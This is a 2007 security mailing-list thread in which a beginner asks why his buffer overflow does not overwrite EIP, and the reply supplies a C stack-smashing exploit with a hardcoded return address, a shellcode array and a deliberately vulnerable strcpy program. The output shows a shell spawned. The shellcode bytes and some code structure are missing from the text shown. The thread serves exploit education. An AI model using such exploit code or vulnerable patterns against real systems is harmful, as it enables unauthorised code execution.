Vuln Dev
Re: understanding buffer overflows Nov 01 2007 02:01PM
adimitro gmail com
Try this.. it is in C but you shouldn't have problems rewriting it..

In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer


Best Regards,



Overflow written for:

x86 Pentium 4

Linux version 2.6.5-7.104-default

gcc version 3.3.3

SuSE Linux


#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#define MAX_BUF 530

#define RETADDR 0xbffff0c0

int main()


int i;

char shellcode[] =




char buffer[MAX_BUF];

// fill the buffer with the return address

//the address to be overwritten is 524 bytes from the addr of buffer

for (i=0; i<MAX_BUF; i+=4)

*(long *)&buffer[i] = RETADDR;

memcpy(buffer, shellcode, sizeof(shellcode));

buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00

// I compiled the code provided as "vuln"

execlp("./vuln", "vuln", buffer, NULL);





***@localhost:~> ./test

sh-2.05b$ exit





#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int foo (char *input)


char buffer [512];

strcpy(buffer, input);

return (0);


int main (int argc, char * argv[])


if (argc > 1)



printf("usage: %s string", argv[0]);

exit (0);


- Show quoted text -

On 31 Oct 2007 14:36:22 -0000, secacc7 (at) hotmail (dot) com [email concealed] <secacc7 (at) hotmail (dot) com [email concealed]> wrote:

hello, my name is michael, im from austria - so my english is very bad.

A few days ago i begin to experiment with bufferoverflows in linux.

i wrote a little c++ programm like this:

#include < string.h>

void main()


char buffer[10];


strcpy((char *)buffer,(char *)COPY);


k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten

so i put a few lines in the program to output addresses from functions and variables.

addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)

i think this is maybe the problem - but why?

output from gdb:

eax 0x0 0

ecx 0x41414141 1094795585

edx 0x1d7 471

ebx 0xb7e27ff4 -1209892876

esp 0x4141413d 0x4141413d

ebp 0x41414141 0x41414141

esi 0xb7f77ce0 -1208517408

edi 0x0 0

eip 0x80484ad 0x80484ad

eflags 0x210286 [ PF SF IF RF ID ]

cs 0x73 115

ss 0x7b 123

ds 0x7b 123

es 0x7b 123

fs 0x0 0

gs 0x33 51

hope anybody can help me understand/learn.

greets from austria, michael

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus